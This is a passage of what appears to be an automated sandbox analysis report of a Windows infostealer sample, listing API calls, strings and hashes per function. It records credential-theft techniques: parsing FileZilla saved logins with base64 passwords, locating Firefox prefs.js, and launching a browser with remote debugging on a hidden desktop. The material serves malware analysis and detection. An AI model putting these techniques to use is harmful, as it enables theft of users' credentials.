                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$InternetOpen
                          • String ID: "$------
                          • API String ID: 2041821634-2370822465
                          • Opcode ID: 04ed63fa57fe1fae11b275a6349b84a243cbb9ace0e3be944a48824bcb749318
                          • Instruction ID: 27cd215b25e213956921f3ebe2cd48210a473c36f4205886a69a14d161a46670
                          • Opcode Fuzzy Hash: 04ed63fa57fe1fae11b275a6349b84a243cbb9ace0e3be944a48824bcb749318
                          • Instruction Fuzzy Hash: 7E526F71A002169BDB21ABB9DD48A9F77B9AF44304F15503AF806B72D1DB78DC05CFA8
                          Function 00416B79 Relevance: 110.8, APIs: 54, Strings: 9, Instructions: 536stringmemoryencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00416B9D
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00416BCD
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00416BFD
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00416C2F
                          • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00416C3C
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00416C43
                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 00416C5A
                          • lstrlen.KERNEL32(00000000), ref: 00416C65
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00416CA8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00416CCF
                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 00416CE2
                          • lstrlen.KERNEL32(00000000), ref: 00416CED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00416D30
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00416D57
                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00416D6A
                          • lstrlen.KERNEL32(00000000), ref: 00416D75
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00416DB8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00416DDF
                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00416DF2
                          • lstrlen.KERNEL32(00000000), ref: 00416E01
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00416E49
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00416E71
                          • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00416E94
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00416EA8
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00416EC9
                          • LocalFree.KERNEL32(00000000), ref: 00416ED4
                          • lstrlen.KERNEL32(?), ref: 00416F6E
                          • lstrlen.KERNEL32(?), ref: 00416F81
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 2641759534-2314656281
                          • Opcode ID: e9fea34015fb0c7d9f27d3fba072ce80c653791ad47483ec24c595c09895995e
                          • Instruction ID: 4aeb7553f5faa1c3fc6259bbd3118fa4e1f792876889c6ef11b00afc158b1bcd
                          • Opcode Fuzzy Hash: e9fea34015fb0c7d9f27d3fba072ce80c653791ad47483ec24c595c09895995e
                          • Instruction Fuzzy Hash: 4502A170B00215AFCB11ABB5DD8DA9F7B7AAF04704F15142AF805E7291DFB8D941CBA8
                          Function 00414B10 Relevance: 79.8, APIs: 44, Strings: 1, Instructions: 1095stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00414B51
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00414B74
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00414B7F
                          • lstrlen.KERNEL32(00434CA8), ref: 00414B8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00414BA7
                          • lstrcat.KERNEL32(00000000,00434CA8), ref: 00414BB3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00414BDE
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00414BFA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID: prefs.js
                          • API String ID: 2567437900-3783873740
                          • Opcode ID: 9f4765d053e3773a725a9bbcbcef2a92c3d3c3466fbb51977546b13449c9c511
                          • Instruction ID: 96128fc308192cafbb81789864f6749e9696443de39f29eb3bb614e824a23235
                          • Opcode Fuzzy Hash: 9f4765d053e3773a725a9bbcbcef2a92c3d3c3466fbb51977546b13449c9c511
                          • Instruction Fuzzy Hash: 57923270A01605CFDB25CF29D948BDAB7E5AF84314F1980AEE8099B3A1D779DC81CF94
                          Function 00411250 Relevance: 62.0, APIs: 41, Instructions: 525stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00411291
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004112B4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 004112BF
                          • lstrlen.KERNEL32(00434CA8), ref: 004112CA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004112E7
                          • lstrcat.KERNEL32(00000000,00434CA8), ref: 004112F3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041131E
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 0041133A
                          • StrCmpCA.SHLWAPI(?,004317A0), ref: 0041135C
                          • StrCmpCA.SHLWAPI(?,004317A4), ref: 00411376
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 004113AF
                          • lstrcpy.KERNEL32(00000000,?), ref: 004113D7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 004113E2
                          • lstrlen.KERNEL32(00431794), ref: 004113ED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041140A
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00411416
                          • lstrlen.KERNEL32(?), ref: 00411423
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411443
                          • lstrcat.KERNEL32(00000000,?), ref: 00411451
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041147A
                          • StrCmpCA.SHLWAPI(?,00FBCF38), ref: 004114A3
                          • lstrcpy.KERNEL32(00000000,?), ref: 004114E4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041150D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411535
                          • StrCmpCA.SHLWAPI(?,00FBD868), ref: 00411552
                          • lstrcpy.KERNEL32(00000000,?), ref: 00411593
                          • lstrcpy.KERNEL32(00000000,?), ref: 004115BC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004115E4
                          • StrCmpCA.SHLWAPI(?,00FBCF68), ref: 00411602
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411633
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041165C
                          • lstrcpy.KERNEL32(00000000,?), ref: 00411685
                          • StrCmpCA.SHLWAPI(?,00FBD028), ref: 004116B3
                          • lstrcpy.KERNEL32(00000000,?), ref: 004116F4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041171D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411745
                          • lstrcpy.KERNEL32(00000000,?), ref: 00411796
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004117BE
                          • lstrcpy.KERNEL32(00000000,?), ref: 004117F5
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0041181C
                          • FindClose.KERNEL32(00000000), ref: 0041182B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                          • String ID:
                          • API String ID: 1346933759-0
                          • Opcode ID: bea78667bade33136e360a4ef188ad232c2d3832278c2d27ff4b897d88a25793
                          • Instruction ID: 68930a77b454920cac28dd481b56dceb7b10e8baaefe5b7b669585f4eccf4a8a
                          • Opcode Fuzzy Hash: bea78667bade33136e360a4ef188ad232c2d3832278c2d27ff4b897d88a25793
                          • Instruction Fuzzy Hash: D1129370A102069BCB24EF79DD89AEF77B5AF44304F04452EF946A73A0DB78DC458B94
                          Function 0041CBE0 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 310filestringCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 0041CBFC
                          • FindFirstFileA.KERNEL32(?,?), ref: 0041CC13
                          • lstrcat.KERNEL32(?,?), ref: 0041CC5F
                          • StrCmpCA.SHLWAPI(?,004317A0), ref: 0041CC71
                          • StrCmpCA.SHLWAPI(?,004317A4), ref: 0041CC8B
                          • wsprintfA.USER32 ref: 0041CCB0
                          • PathMatchSpecA.SHLWAPI(?,00FB8AD0), ref: 0041CCE2
                          • CoInitialize.OLE32(00000000), ref: 0041CCEE
                            • Part of subcall function 0041CAE0: CoCreateInstance.COMBASE(0042B110,00000000,00000001,0042B100,?), ref: 0041CB06
                            • Part of subcall function 0041CAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0041CB46
                            • Part of subcall function 0041CAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 0041CBC9
                          • CoUninitialize.COMBASE ref: 0041CD09
                          • lstrcat.KERNEL32(?,?), ref: 0041CD2E
                          • lstrlen.KERNEL32(?), ref: 0041CD3B
                          • StrCmpCA.SHLWAPI(?,0042CFEC), ref: 0041CD55
                          • wsprintfA.USER32 ref: 0041CD7D
                          • wsprintfA.USER32 ref: 0041CD9C
                          • PathMatchSpecA.SHLWAPI(?,?), ref: 0041CDB0
                          • wsprintfA.USER32 ref: 0041CDD8
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0041CDF1
                          • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041CE10
                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 0041CE28
                          • CloseHandle.KERNEL32(00000000), ref: 0041CE33
                          • CloseHandle.KERNEL32(00000000), ref: 0041CE3F
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041CE54
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041CE94
                          • FindNextFileA.KERNEL32(?,?), ref: 0041CF8D
                          • FindClose.KERNEL32(?), ref: 0041CF9F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                          • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                          • API String ID: 3860919712-2388001722
                          • Opcode ID: 762c265963974d8a3b5201397d5c00f5dbfbfa05dfd14c4931b4725b635083f4
                          • Instruction ID: f8520120a7f7ce95aea0cf0dc641d4b00008e37613aeed1fa22f9fd062c4b8f8
                          • Opcode Fuzzy Hash: 762c265963974d8a3b5201397d5c00f5dbfbfa05dfd14c4931b4725b635083f4
                          • Instruction Fuzzy Hash: F9C17371A003189FCB20DF64DC89AEE777AAF88304F144599F509A7290DF74AA85CFA4
                          Function 00411269 Relevance: 43.8, APIs: 29, Instructions: 336stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00411291
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004112B4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 004112BF
                          • lstrlen.KERNEL32(00434CA8), ref: 004112CA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004112E7
                          • lstrcat.KERNEL32(00000000,00434CA8), ref: 004112F3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041131E
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 0041133A
                          • StrCmpCA.SHLWAPI(?,004317A0), ref: 0041135C
                          • StrCmpCA.SHLWAPI(?,004317A4), ref: 00411376
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 004113AF
                          • lstrcpy.KERNEL32(00000000,?), ref: 004113D7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 004113E2
                          • lstrlen.KERNEL32(00431794), ref: 004113ED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041140A
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00411416
                          • lstrlen.KERNEL32(?), ref: 00411423
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411443
                          • lstrcat.KERNEL32(00000000,?), ref: 00411451
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041147A
                          • StrCmpCA.SHLWAPI(?,00FBCF38), ref: 004114A3
                          • lstrcpy.KERNEL32(00000000,?), ref: 004114E4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041150D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411535
                          • StrCmpCA.SHLWAPI(?,00FBD868), ref: 00411552
                          • lstrcpy.KERNEL32(00000000,?), ref: 00411593
                          • lstrcpy.KERNEL32(00000000,?), ref: 004115BC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004115E4
                          • lstrcpy.KERNEL32(00000000,?), ref: 00411796
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004117BE
                          • lstrcpy.KERNEL32(00000000,?), ref: 004117F5
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0041181C
                          • FindClose.KERNEL32(00000000), ref: 0041182B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                          • String ID:
                          • API String ID: 1346933759-0
                          • Opcode ID: 18778ca0182dff7fb4d93401d49f09d25fee920ab18524c459e30ff890c046a9
                          • Instruction ID: 99e12ac4dd193ae99830e339af0b4d11ad46e1dced0c46203470acebc7f531b4
                          • Opcode Fuzzy Hash: 18778ca0182dff7fb4d93401d49f09d25fee920ab18524c459e30ff890c046a9
                          • Instruction Fuzzy Hash: 4CC19371B102069BCB21EF79DD89AEF77B5AF04304F04102AF945A32A1DB78DC458FA4
                          Function 00409770 Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 234stringsleepCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 00409790
                          • lstrcat.KERNEL32(?,?), ref: 004097A0
                          • lstrcat.KERNEL32(?,?), ref: 004097B1
                          • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 004097C3
                          • memset.MSVCRT ref: 004097D7
                            • Part of subcall function 00423E70: lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00423EA5
                            • Part of subcall function 00423E70: lstrcpy.KERNEL32(00000000,00FBA168), ref: 00423ECF
                            • Part of subcall function 00423E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,0040134E,?,0000001A), ref: 00423ED9
                          • wsprintfA.USER32 ref: 00409806
                          • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00409827
                          • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00409844
                            • Part of subcall function 004246A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004246B9
                            • Part of subcall function 004246A0: Process32First.KERNEL32(00000000,00000128), ref: 004246C9
                            • Part of subcall function 004246A0: Process32Next.KERNEL32(00000000,00000128), ref: 004246DB
                            • Part of subcall function 004246A0: StrCmpCA.SHLWAPI(?,?), ref: 004246ED
                            • Part of subcall function 004246A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00424702
                            • Part of subcall function 004246A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00424711
                            • Part of subcall function 004246A0: CloseHandle.KERNEL32(00000000), ref: 00424718
                            • Part of subcall function 004246A0: Process32Next.KERNEL32(00000000,00000128), ref: 00424726
                            • Part of subcall function 004246A0: CloseHandle.KERNEL32(00000000), ref: 00424731
                          • lstrcat.KERNEL32(00000000,?), ref: 00409878
                          • lstrcat.KERNEL32(00000000,?), ref: 00409889
                          • lstrcat.KERNEL32(00000000,00434B60), ref: 0040989B
                          • memset.MSVCRT ref: 004098AF
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 004098D4
                          • lstrcpy.KERNEL32(00000000,?), ref: 00409903
                          • StrStrA.SHLWAPI(00000000,00FBDF78), ref: 00409919
                          • lstrcpyn.KERNEL32(006393D0,00000000,00000000), ref: 00409938
                          • lstrlen.KERNEL32(?), ref: 0040994B
                          • wsprintfA.USER32 ref: 0040995B
                          • lstrcpy.KERNEL32(?,00000000), ref: 00409971
                          • Sleep.KERNEL32(00001388), ref: 004099E7
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 00401557
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 00401579
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 0040159B
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 004015FF
                            • Part of subcall function 004092B0: strlen.MSVCRT ref: 004092E1
                            • Part of subcall function 004092B0: strlen.MSVCRT ref: 004092FA
                            • Part of subcall function 004092B0: strlen.MSVCRT ref: 00409399
                            • Part of subcall function 004092B0: strlen.MSVCRT ref: 004093E6
                            • Part of subcall function 00424740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00424759
                            • Part of subcall function 00424740: Process32First.KERNEL32(00000000,00000128), ref: 00424769
                            • Part of subcall function 00424740: Process32Next.KERNEL32(00000000,00000128), ref: 0042477B
                            • Part of subcall function 00424740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 0042479C
                            • Part of subcall function 00424740: TerminateProcess.KERNEL32(00000000,00000000), ref: 004247AB
                            • Part of subcall function 00424740: CloseHandle.KERNEL32(00000000), ref: 004247B2
                            • Part of subcall function 00424740: Process32Next.KERNEL32(00000000,00000128), ref: 004247C0
                            • Part of subcall function 00424740: CloseHandle.KERNEL32(00000000), ref: 004247CB
                          • CloseDesktop.USER32(?), ref: 00409A1C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
